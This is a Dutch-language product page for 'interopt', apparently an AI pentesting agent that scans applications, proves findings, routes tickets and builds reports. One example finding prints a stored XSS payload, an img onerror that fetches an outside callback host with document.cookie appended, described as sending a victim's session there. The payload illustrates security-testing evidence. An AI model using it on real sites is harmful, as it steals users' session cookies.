NieuwStart je eerste gratis run
Product

Een senior pentester die test, bewijst en oplost.

Black box vanaf een URL, grey box met inloggegevens, white box over je repositories heen. interopt weigert iets te rapporteren wat het niet kan aantonen tegen wat het werkelijk heeft gezien.

inventaris

Alles wat getest wordt, in één lijst.

Elk doel in één inventaris, met score en eigenaar: een URL, een API en de repository erachter staan in dezelfde lijst in plaats van in drie verschillende tools.

01 / De workspace

Van de eerste request tot de gemergde fix.

De run, de bevindingen die hij bewijst, de tickets die ze worden en het rapport aan het eind staan in één workspace.

Scans

Kijk live mee, en speel het daarna af.

Elke scan doorloopt dezelfde vier fases: voorbereiding, verkennen, scannen en rapporteren. De output van de agent komt binnen terwijl hij werkt, en daarna wordt hetzelfde scherm een replay waar je doorheen kunt spoelen.

  • Output gelabeld per fase en container
  • Afspelen op 1×, 2×, 4× of 8×
  • Het volledige log, per run te downloaden
Live sessie in de docs
Execution board
Scan complete
grey-box / 7F4A2233 · 4h 41m
Step 1Prerequisites
Step 2Discover
Step 3Scan
Step 4Report
Replayall containers Download log
[discover]214 routes mapped on api.acme.io
[discover]3 auth flows recorded: session, refresh, invite
[scan]GET /v2/orders/8842 as [email protected]
[scan]200 · body carries customer cus_19 (alice)
[scan]Confirmed: order lookup skips the owner check
[report]F-4CE0EE34 written with request and response
1×2×4×8×
Bevindingen

Elke bevinding opent met het bewijs.

Beschrijving, risico, observatie en remediatie, in die volgorde. De observatie bevat de requests die het bewezen, en de CVSS-score klapt open tot de vector erachter, metric voor metric.

  • CVSS 3.1 of 4.0, één schaal per workspace
  • OWASP WSTG-test-id bij webbevindingen
  • Eén bevinding hertesten zonder de hele asset te scannen
Ernst en scoring
highF-D88A7A48Stored XSS in shared report view
Settings Re-test
FindingSuggested fixAIActivity4Notes
Observation

The report title is stored as sent and rendered unescaped when the share link is opened:

1POST /api/reports HTTP/2
2Host: app.acme.io
3
4{"title":"<img src=x onerror=fetch('//oob.acme-
5test.io/'+document.cookie)>"}

Opening the link as a second user sent their session to the callback host.

CVSS v3.1Severity breakdown7.6High
AVAttack VectorN NetworkA AdjacentL Local
ACAttack ComplexityL LowH High
PRPrivileges RequiredN NoneL LowH High
UIUser InteractionN NoneR Required
Issue routing

Bevindingen komen vanzelf in je tracker.

Zet automatische issues aan bij het instellen van een scan en elke bevinding die hij bewijst wordt een gekoppeld ticket. De status van het ticket komt terug op de bevinding, zodat niets twee keer bijgewerkt hoeft te worden.

  • Jira, Linear, GitHub, GitLab, Datadog en ServiceNow
  • Meldingen naar Slack, Teams of Discord
  • Tickets sluiten zodra een hertest de fix bevestigt
Issue routing
Step 5
After the scan
Create issues automaticallyAfter a successful scan, one linked issue for each finding.
Issue trackerLinear · team Platform
Jiraproject SECLinearteam PlatformGitHubacme/apiGitLabconfidential issueDatadogwork item
highMissing CSRF protection on POST /billing
PLAT-482In progressSync status
Rapporten

Een rapport opgebouwd uit de runs zelf.

Kies het pentestrapport of de managementsamenvatting, selecteer de scans, en bevindingen, bewijs, scores en scope vullen zich in. Deel het als privélink die verloopt, een wachtwoord heeft en elke weergave vastlegt.

  • Een melding zodra iemand je gedeelde link opent
  • Ingeplande rapporten die terugkerende runs volgen
Rapporttemplates
Step 01
Template
Penetration Test ReportCONFIDENTIAL
criticalSQL injection on /api/v1/usershighAny user can read another customer's ordermediumReflected XSS on /search
Pentest reportScope, scoring and every finding with evidence.
Executive SummaryCONFIDENTIAL
D24open findings
Executive summaryCover, summary and scope for leadership.
Share report
A private, read-only link for this report.
app.interopt.ai/r/wmMBMzCH02kLu…Ok8 Copy
Expires24h7d15d30d
Password protection
Draft watermark
Track every view
MO Viewed by auditor · 2h agoDone
02 / Vergelijken

Wat elke aanpak je werkelijk oplevert.

Elk van deze aanpakken doet één deel van het werk goed. Je hebt het allemaal nodig — bewijs, de logische fouten, het bestand en de regel, de fix, en hetzelfde opnieuw bij de volgende release.

Handmatige pentest
DAST-scanner
Statische analyse
Elke bevinding aangetoond, met bewijs dat je kunt herhalen
Soms
Vindt fouten in rechten en workflows
Wijst het bestand en de regel achter het gedrag aan
Soms
Levert de fix als pull request
Sommige tools
Rapport op pentestniveau zodra de run klaar is
Direct
Weken later
Draait opnieuw bij elke deploy
03 / In interopt

Alles om de agent heen.

Tijdelijke omgevingen

Waar er niets draait om te testen, bouwt de agent het doel uit de broncode en breekt het daarna af. Productie blijft buiten scope tenzij jij het erin zet.

Self-hosted (binnenkort)

Het geheel draaien binnen je eigen infrastructuur, voor wanneer de code je netwerk niet uit mag.

Elke stack die het kan bereiken of lezen

Het testen gebeurt tegen de applicatie zoals die is uitgerold, dus de taal is nooit een voorwaarde. Koppel de broncode en de agent leidt de frameworks zelf af uit de repository.

klaar wanneer jij dat bent

Geef het wat je hebt. Krijg bewijs terug.

Een URL, een set inloggegevens, of de repository zelf. interopt test wat het krijgt, bewijst wat het vindt, en opent met je code gekoppeld de pull request die het oplost.